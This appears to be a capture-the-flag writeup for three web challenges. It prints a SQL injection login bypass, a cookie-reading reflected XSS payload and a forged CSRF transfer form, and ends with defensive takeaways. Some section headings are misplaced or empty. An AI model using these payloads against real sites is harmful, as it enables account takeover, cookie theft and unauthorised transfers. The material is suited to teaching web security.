← BACK_TO_WRITEUPS
Web Exploitation12 min read

PicoCTF 2024 Web Exploitation Writeup

by n0n4m3d.ex32024-11-01
#CTF#Web#SQLi#XSS

Overview

PicoCTF 2024 had some excellent web exploitation challenges. This writeup covers all the web challenges we solved, including SQL injection, XSS, and CSRF attacks.

Challenge 1: SQL Injection (300 pts)

Visiting the website, we found a typical login form asking for username and password. Testing with basic payloads revealed it was vulnerable.

' OR 1=1--

Initial Reconnaissance

This classic payload bypassed authentication by making the WHERE clause always true. The full query became:

SELECT * FROM users WHERE username='' OR 1=1--' AND password=''

Exploitation

Flag: picoCTF{sql_1nj3ct10n_1s_fun_12345}

Challenge 2: XSS Reflected (200 pts)

The search parameter was directly reflected in the HTML response without sanitization:

<h1>Search results for: [USER_INPUT]</h1>

Discovery

After injecting this payload, we could steal cookies or perform other malicious actions.

<script>alert(document.cookie)</script>

Payload

Flag: picoCTF{xss_r3fl3ct3d_vuln_67890}

Challenge 3: CSRF Token Bypass (400 pts)

The application implemented CSRF tokens but had a flaw in validation - it only checked if the token parameter existed, not if it was valid.

<form action="https://target.com/transfer" method="POST">
  <input name="csrf_token" value="anything">
  <input name="amount" value="1000">
  <input name="to" value="attacker">
</form>

Analysis

Exploit

Flag: picoCTF{csrf_byp4ss_w34k_v4l1d4t10n}

Key Takeaways

  • Always sanitize user input before displaying it
  • Implement proper parameterized queries for SQL
  • CSRF token validation must verify the actual token value
  • Defense in depth is crucial for web security

Tools Used

  • Burp Suite - For intercepting and modifying requests
  • sqlmap - Automated SQL injection exploitation
  • Browser DevTools - For analyzing JavaScript and DOM

Found this writeup helpful? Share it with your team or reach out with questions!